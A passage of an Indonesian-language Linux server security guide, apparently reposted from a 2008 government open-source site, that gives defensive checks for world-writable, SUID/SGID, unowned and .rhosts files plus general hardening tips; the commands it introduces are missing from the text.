- Berikan perhatian ekstra jika anda menjalankan layanan ftp publik (anonymous ftp) terutama sekali jika anda
menggunakan Wu-ftpd, juga pada DNS Server anda jika anda menggunakan BIND, karena kedua service ini paling
rentan terhadap masalah keamanan ( terbukti sering terjadi "tambal sulam" pada dua prog ini).
- Akhirnya, sebelum merubah perijinan di sembarang sistem file, pastikan anda paham apa yang anda lakukan. Jangan
pernah merubah permisi suatu file hanya karena ini tampaknya merupakan cara termudah menyelesaikan sesuatu.
Selalu tentukan mengapa file memiliki permisi tersebut sebelum merubahnya.
- Awasi user Anda: berdasarkan pembahasan tersebut di atas, kemungkinan untuk melakukan penyusupan secara
langsung prosentasenya lebih sedikit daripada kenakalan yang dilakukan melalui user internal.
Mendeteksi Gangguan Secara Dini
Penting bagi system administrator untuk memeriksa sistem sedini mungkin dari tindakan penyusupan yang mungkin
saja dilakukan, baik oleh user biasa maupun penyusup dari luar. Berikut ini adalah prosedur pendeteksian gangguan
secara dini
- File-file read-writable, utamanya file sistem, dapat menjadi lubang keamanan jika seorang cracker memperoleh akses
ke sistem Anda dan memodifikasinya. Selain itu direktori read-writable berbahaya, karena memungkinkan cracker
menambah atau menghapus file sesuai keinginannya. Untuk mencari seluruh file world-writable di sistem Anda, gunakan
perintah berikut:
hasilnya adalah sebagai berikut:
- File-file SUID dan SGID pada sistem Anda adalah risiko keamanan potensial, dan harus diawasi dengan baik. Oleh
karena program-program ini memberi ijin khusus bagi pemakai yang mengeksekusinya, maka perlu dipastikan bahwa
program yang tidak aman tidak diinstal. Trik favorit cracker adalah mengeksploitasi program SUID "root", lalu
meninggalkan program SUID sebagai backdoor untuk masuk di saat lain, meski lubang yang asli telah ditutup. Carilah
seluruh program SUID/SGID di sistem Anda, dan catatlah, sehingga Anda mengerti setiap perubahan yang dapat
mengindikasikan penyusup potensial. Gunakan perintah berikut untuk mencari seluruh program SUID/SGID di sistem
Anda:
- File-file yang tidak ada pemiliknya juga dapat menjadi indikasi penyusup telah mengakses sistem Anda. Anda dapat
menemukan file-file di sistem Anda yang tidak memiliki pemilik, atau milik suatu kelompok dengan perintah :
Jika hasilnya seperti tampak pada gambar berikut ini, berarti Anda bisa bernafas lega :)
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
- Mencari file .rhosts seharusnya menjadi bagian tugas reguler Anda sebagai sistem administrator, karena file ini tidak
diijinkan ada di sistem Anda. Ingat, cracker hanya perlu satu rekening tidak aman untuk secara potensial memperolah
akses ke seluruh jaringan Anda. Anda dapat melihat seluruh file .rhosts di sistem Anda dengan perintah :
Penutup
Keamanan sampai saat ini masih merupakan issue yang paling populer dan akan terus dibahas sampai kapan pun
juga, seiring dengan kemajuan teknologi informasi.
Tingkat keamanan komputer yang cukup baik, tidak sulit untuk digunakan pada PC pribadi. Upaya lebih yang lebih baik
lagi dibutuhkan oleh mesin yang digunakan untuk bisnis, namun saat ini ada sistem operasi Linux dapat menjadi
platform yang aman. Oleh karena sifat pengembangan Linux, perbaikan keamanan sering dikeluarkan lebih cepat
daripada pada sistem operasi komersil, menjadikan Linux menjadi platform yang ideal pada saat keamanan menjadi
suatu persyaratan yang mutlak di dunia bisnis.
Sampai saat ini belum ditemukan sistem pengamanan yang terbaik, kecuali Anda memutuskan jaringan LAN dan kabel
modem Anda, serta mengunci PC Anda kedalam lemari besi. Bila cara ini juga kurang memuaskan, Anda bisa menjual
PC Anda kepada orang lain atau membakar PC Anda sendiri, kemudian beralih kepada mesin ketik dan televisi :)).
Usaha yang paling memungkinkan sampai saat ini dalam mengamankan sistem Anda, antara lain adalah:
- Periksalah selalu log sistem seperti /var/log/messages dan perhatikan sistem Anda berjalan
- Ikutilah miling list yang membahas masalah keamanan, seperti: bugs traq, tanya-jawab, dan lain-lain milis yang
membahas masalah keamanan
- Senantiasa upgrade program Anda dengan versi terbaru yang sudah terbukti bug- fixed
Dengan berlangganan milis yang membahas mengenai keamanan, dan selalu mengikuti perkembangan, Anda dapat
melakukan banyak hal untuk mengamankan mesin Anda. Jika Anda senantiasa memperhatikan file-file log Anda dan
menjalankan sesuatu seperti tripwire secara rutin, Anda dapat melakukan upaya pengamanan sistem yang lebih jauh
lagi.
http://opensource.jawatengah.go.id - opensource.jawatengah.go.id - opensource.opPeonwcerareckd. obry. idMambo Generated:15 March, 2008, 01:24
Tidak ada komentar:
Posting Komentar